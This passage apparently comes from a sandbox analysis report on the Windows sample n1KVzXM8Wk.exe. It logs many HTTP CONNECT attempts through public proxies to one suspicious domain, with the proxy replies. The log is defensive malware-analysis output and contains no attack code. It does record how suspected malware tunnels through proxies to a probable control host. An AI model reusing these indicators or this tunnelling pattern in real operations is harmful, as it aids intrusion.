                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      979192.168.2.450840203.253.142.17680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.322426081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      980192.168.2.452493104.238.111.107154196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.368700027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.865725040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.365885019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.365824938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.178503990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      981192.168.2.451325162.253.68.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.369354010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      982192.168.2.450339164.92.85.180239716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.383944988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.475038052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.475238085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.475294113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      983192.168.2.45289844.190.9.65481006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.391200066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      984192.168.2.452911203.32.120.195806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.391525984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.479170084 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      985192.168.2.452485160.153.254.240398806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.404036045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      986192.168.2.45254891.107.143.23331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.409451008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.475052118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.475238085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.433053970 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      987192.168.2.450186129.154.227.1431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.422686100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      988192.168.2.45261145.79.197.129816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.467160940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      989192.168.2.452903162.214.164.200426246812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.467283010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.943778038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.464879036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.492160082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.556094885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.647078037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.834619045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.944292068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.146888018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      990192.168.2.452922203.24.103.8806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.467291117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.555072069 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      991192.168.2.452886115.171.217.4878916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.467461109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      992192.168.2.452897186.124.164.213806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.489924908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      993192.168.2.452901212.31.100.13841536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.502012014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      994192.168.2.452550189.240.60.16390906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.502118111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.692359924 CET72INHTTP/1.1 200 Connection established
                                                                                                      Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      995192.168.2.452890175.183.82.221806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.502193928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      996192.168.2.452916138.197.208.9380806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.502194881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.657547951 CET149INHTTP/1.1 301 Moved Permanently
                                                                                                      Location: //heygirlisheeverythingyouwantedinaman.com:443/
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      997192.168.2.452870123.233.245.15890806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.502211094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.860691071 CET327INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      998192.168.2.45029741.160.23.11441536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.550621986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      999192.168.2.4510698.218.159.17190016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.562407970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1000192.168.2.450982111.68.127.17041536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.572025061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1001192.168.2.45292945.81.232.1791656812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.572051048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.121985912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740921974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1002192.168.2.45112691.134.140.16088796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.592134953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.975070953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.365883112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178379059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.682979107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178982973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1003192.168.2.451342141.94.174.624506812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.592204094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1004192.168.2.450970103.10.99.11056786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.592788935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1005192.168.2.452662104.19.217.219806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.605834007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.693223000 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1006192.168.2.452841111.53.178.24973026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.606426001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.903552055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1007192.168.2.450462161.97.170.209246066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.608644962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.682871103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.865900040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.882149935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:47.881191015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:59.881187916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:11.943718910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1008192.168.2.45110354.38.179.162136936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.608851910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1009192.168.2.452601148.72.211.168286586812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.630347967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1010192.168.2.452957172.67.35.15806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.666754961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.754050016 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
